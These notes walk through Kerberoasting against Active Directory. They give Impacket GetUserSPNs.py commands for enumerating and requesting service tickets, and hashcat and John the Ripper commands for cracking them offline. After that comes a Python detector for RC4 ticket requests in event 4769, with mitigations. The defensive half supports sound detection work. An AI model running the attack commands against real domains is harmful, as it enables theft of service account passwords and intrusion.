Kerberoasting

Step 1: Get the SPN (Service Principal Name)

Use Impacket's GetUserSPNs.py script to enumerate the domain accounts that have an SPN set (these are the Kerberoastable accounts):

python3.9 /opt/impacket/examples/GetUserSPNs.py -dc-ip <DC_IP> <DOMAIN>/<USER>

Step 2: Request a TGS (Ticket Granting Service)

To request a TGS for a specific service account, use the same script with the -request-user flag:

python3.9 /opt/impacket/examples/GetUserSPNs.py -dc-ip <DC_IP> <DOMAIN>/<USER> -request-user <SERVICE_ACCOUNT>

Step 3: Crack the TGS

Once you have the TGS saved as a hash file, crack it offline with a password-cracking tool. Hashcat mode 13100 and John's krb5tgs format both handle the RC4 (etype 23) TGS-REP hash format.

  • Using Hashcat:

hashcat -a 0 -m 13100 spn.hash /usr/share/wordlists/rockyou.txt

  • Using John the Ripper:

john --format=krb5tgs --wordlist=$wordlist kerberoastables.txt
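From the defender's side, the steps above leave a distinctive trace in Windows Security event 4769 (Kerberos service ticket request): one account pulling RC4 (TicketEncryptionType 0x17, the etype hashcat mode 13100 cracks) tickets for many different service accounts in a short window. The detector below is an added example, not part of these notes or of Impacket; the event records are constructed samples and the field names, window and threshold are assumptions.

```python
# Added example: flag Kerberoasting-like patterns in Windows event 4769 records.
# Indicators: RC4 ticket encryption (0x17) requested for non-machine service
# accounts, and one requester hitting many distinct services within a window.
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records; keys loosely mirror event 4769 fields.
SAMPLE_4769 = [
    {"ts": "2024-01-10T09:00:01", "user": "jsmith@CORP", "svc": "sqlsvc", "etype": "0x17"},
    {"ts": "2024-01-10T09:00:02", "user": "jsmith@CORP", "svc": "backupsvc", "etype": "0x17"},
    {"ts": "2024-01-10T09:00:02", "user": "jsmith@CORP", "svc": "websvc", "etype": "0x17"},
    {"ts": "2024-01-10T09:00:03", "user": "jsmith@CORP", "svc": "WS01$", "etype": "0x17"},
    {"ts": "2024-01-10T09:05:00", "user": "alice@CORP", "svc": "sqlsvc", "etype": "0x12"},
    {"ts": "2024-01-10T09:06:00", "user": "bob@CORP", "svc": "krbtgt", "etype": "0x17"},
]


def is_roastable_target(svc):
    # Machine accounts ($) and krbtgt are excluded: Kerberoasting goes after
    # user accounts with SPNs, whose passwords are human-chosen and crackable.
    return not svc.endswith("$") and svc.lower() != "krbtgt"


def find_kerberoasting(events, window=timedelta(minutes=5), min_services=3):
    """Return {requester: sorted service list} for requesters that asked for
    RC4 tickets to at least min_services distinct roastable services
    within `window` (assumed threshold; tune to the environment)."""
    per_user = defaultdict(list)
    for e in events:
        if e["etype"] == "0x17" and is_roastable_target(e["svc"]):
            per_user[e["user"]].append((datetime.fromisoformat(e["ts"]), e["svc"]))
    hits = {}
    for user, reqs in per_user.items():
        reqs.sort()
        for i, (t0, _) in enumerate(reqs):
            # distinct services requested in the window starting at reqs[i]
            svcs = {s for t, s in reqs[i:] if t - t0 <= window}
            if len(svcs) >= min_services:
                hits[user] = sorted(svcs)
                break
    return hits


if __name__ == "__main__":
    for user, svcs in find_kerberoasting(SAMPLE_4769).items():
        print(f"possible Kerberoasting by {user}: {svcs}")
```

Real 4769 volume is high, so in production this logic belongs in the SIEM with the same exclusions (machine accounts, krbtgt) and a per-environment threshold; AES-only service accounts and long random service passwords are the matching mitigations.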
